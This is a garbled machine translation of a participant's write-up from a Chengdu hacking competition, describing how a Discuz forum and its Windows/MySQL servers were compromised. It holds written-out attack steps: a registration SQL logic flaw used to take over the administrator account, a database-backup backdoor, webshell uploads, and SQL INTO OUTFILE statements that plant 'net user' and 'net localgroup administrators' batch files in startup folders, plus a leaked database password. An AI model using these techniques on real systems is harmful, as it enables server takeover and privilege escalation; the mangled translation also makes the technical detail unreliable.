Technical details and individual comments in Chengdu Attack and Defense Competition in Sichuan (one article)

$ Query = $ db-> query ( "SELECT COUNT (*) FROM $ table_members WHERE username = '$ username' $ emailadd"); if ($ db-> result ($ query, 0)) {showmessage ( 'profile_account_duplicate' } The default $ EMAILADD = "OR email = '$ email'" is satisfied, so the SQL statement above turns into the username and mailbox, any one, prompt "The username or email address has been registered Please return again. "The method used to assign $ Doublee, then you can use $ emaildd =" or email = '$ email' ", then construct $ EmailAdd this variable, this is what I am The reason for the Action structure of the local form.

Then the statement has changed to the SQL statement above:

Select count (*) from $ table_members where username = '$ usrname' and uid = 100000 Since the username and user ID judgment, then this is definitely not established, you can skip the IF smoothly ($ db-> result). $ query, 0)) {ShowMessage ('profile_account_duplicate');} Directly reach here insert record:

$ DB-> Query ("INSERT INTO $ TABLE_MEMBERS (........) VALUES (........)"); also registered the same username. Then look at Memcp.php, see the update user information, the SQL statement is actually the case.

Update $ TABLE_MEMBERS SET ... WHERE UserName = '$ Discuz_user' Directly updates all user names XX. Oh, I reached the purpose of modifying the administrator's password. Oh, the DZ Forum does not use ID to judge the update is not rigorous. Without considering uniqueness ... I successfully upgrade your own forum users, after entering the background, we can do more, insert a record, export file, you can write files on the hard disk, because I don't know the web directory The path, so you can't export files with Select ... .into outfile, and this time the database is separated from the web server, even if the guide is also exported on the MySQL server. But there is still a way, I am immediately executed in the "Database Upgrade":

INSERT INTO `CDB_FORUMLINKS`,` Name`, `URL`,` Name`, `logo`) Values ​​('', '0', '', ',' ',' '); Black body part is the back door code I wrote, then select the minimum backup of the database backup, change the extension to.php After backup, we can upload files to the forumData directory, there may be many newcomers asking, how do I understand? Because I used the Discuz Forum, I have studied this forum, so I am still very familiar with this forum. If anyone doesn't understand it, you can directly build an environment. Then write a form locally for uploading the file:

We uploaded a phpspy, after going, there is only one thing, that is, put the vulnerability of the register.php file, directly

$ Email = Trim ($ email); if (! $ Doublee && Strstr ($ Email, '@')) {$ EmailAdd = "OR Email = '$ Email'";} Change to: $ EMAILADD = "OR Email = '$ email' "; break the back of other opponents, let's pass a few phpspys, let our players slowly play, check the config.php file, see the mysql server address (172.16.0.119) and root users password The original password is Fuck_Mysql, and try the administrator of the Mysql server with this password. There is also the address of phpmyadmin, which is originally a PHP32 directory. Looking at the PHP configuration, the configuration is not bad, it is very careful, but unfortunately, my phpspy can use the Webshell function to add a system account and upgrade to administrator privileges, successfully login 3389, pay attention, pay attention to the security mechanism of Windows Server 2003, Isn't a user of the administrators group not to log in 3389, after reading some basic configurations, see the Effeetech Http Sniffer, the original swordsman has been paying attention to me, haha, pay a file on the desktop and say a greeting, showing the late generation Seniors respect. Then continue to view, the machine name of this web server is SQL !! ?? Depressed, is the mysql server is a web? Bold, guess, the result is right. I didn't remember which bird said that mySQL function even more Access, this time the best is mysql, or I can't get our file. Even if you can pass the things to 119 servers, there is no way to implement it. We only have a passive attack method, write files to the administrator's launch group, because we have tried it before, can only write a line, so if we add Users and improve the permissions to start twice, only restarted, but also the administrator will log in. There is only this road, say it, or do it in the database upgrade in the forum background, in fact, you can execute the SQL statement in phpMyAdmin or phpspy, I am too lazy to open other two.

Create Table Shell (Shell Text Not Null); # Establish Shell Table and a Text-type Shell Field Insert InTo Shell (Shell) VALUES ('Net User Small_A 4Ngel / Add'); # 注意 / ADD Check Check Route, but Can't continue to add a line, add it. Since you can return to your business, you can't add new row, weird. Which big brother can explain? Select * from shell into outfile 'c: // Documents and settings // administrator // "Start" menu // Program // Start //add.bat';# Remember to "/" escape Select * from shell Into Outfile 'C: // documents and settings // all users // "Start" menu // Program // Start //add.bat';# Add a few places. Select * from shell into outfile 'c: // Documents and settings // administrator.Web // "Start" menu // Program // Start //add.bat';# Really there is this directory, indicating that we have not guess before The name of the wrong machine is web, it is really fine, interchange the machine name and the corresponding server. Then I will modify the IP address of the Config.php file of the forum, I said to the administrator, the database is not up, you will start it, soon, when we use 3389 to log in, you will find that the prompt is not allowed to interact. It seems that the user is added. Just because the permissions are not enough, they cannot be logged in. Come once again, after empty the shell data sheet, then execute:

INSERT INTO SHELL (SHELL) VALUES ('Net localgrp administrators small_a / add'); select * from shell INTO OUTFILE 'C: // Documents and Settings // Administrator // "Start" Menu // Program // Launch // Up .bat '; Select * from shell instfile' c: // Documents and settings // all users // "Start" menu // Program // Start //up.bat '; select * from shell Into Outfile' C: // Documents and settings // administrator.Web // "Start" menu // Program // Start //up.bat '; then use the old way to call the administrator to restart, the Swordsman finds our attempt, the administrator Don't login after re-landing, I rely on, we are not the right thing to eat? To say that the forum can't access us? Haha, server administrator is still logging in, I am waiting, we can finally log in with our own users, I saw the three crowns, subordinates of the D disk, and we will take it together. Just ready, the result 119 server 3389 was detained by our opponent D, but also forged IP, which is the data displayed by other team members of our group. They don't have a web server, but they run over to peek at our screen, strongly despise this behavior, D bar D bar, not D3389 port, anyway, I know the file name, It is not far from us now. Just 1 hour is 11 o'clock, I will open phpmyadmin, execute in SQL:

SELECT LOAD_FILE ('D: / Gold Medical.txt') #!! This actually shows empty! Not enough permissions, continue. SELECT LOAD_FILE ('D: / Silver expert.txt') # "congratulations, you are already silver expert!" SELECT load_file ('d: / bronze expert.txt') # 显示 "Not bad, you are already bronze medal expert ! "Just like this, we have got a runner-up and quarterly army before 11 o'clock, but because of the opponent's shameless peek, it caused the terminal of the 119 server. They have been d, which strongly despises this kind of peeping behavior. The swordsman also modified the IP of the mysql server, but did not fix the IP information of the forum, I still can't know the address, when eating, one of the players scan the entire C section 3306 using the port scanner written by itself. Find a goal, the goal is him, because the 3389 of the server is previously hanging, we all encountered this situation, the host did not hang, the service hangs. As a result, it has been waiting for 1 point, and the sword will restart. We have successfully modified the "D: / Gold Expert .txt" file permission, see the content of the file, and got three files smoothly. The whole process is over, and the technical content is not high. I think important is some common sense of ideas and systems, especially Windows Server 2003 and Apache. This strange match ... Personal comments first report to certain media, I think it is necessary to clarify, Sichuan's "Huaxi Metropolis Daily" (Original news network has reprinted) reported that some people control the 100 computers in the Internet caf, which is completely hype, the truth is the kind of "network law enforcement official" tools to deceive, causing a large number of computers outside, people How can I get rid of the upgrade? Secondly, this report says "The game starts at 10:00, when will it end, no one knows, because today, the whole master is coming, if the two" martial arts "arrived, the furnace is often the point of the fire. It is still difficult to divide. "It belongs to hype! There is no master on the game, and some people use the old antique, automatic attacking machine, and the ice river. It is really no way to log in to the 3389 hand test, the person who has received the message CNHONKER will come, who knows the shadow No one, according to the information we have, CNHonker does not have a core member at all in Sichuan. Let us down and final. What is the most angry is whether this report is that the "Southwestern University of National University" said that after the end of the game, he and his teammates took a break at 3 o'clock in the morning yesterday, and I specifically attacked a similar to this. The website of the second game, and successfully succeeded, did not expect, but in the game "铩 而", he frank, the other six members divided into detail, accounting for a lot of cheap, but the endless reason is that they are ready And when the game, the move was slow.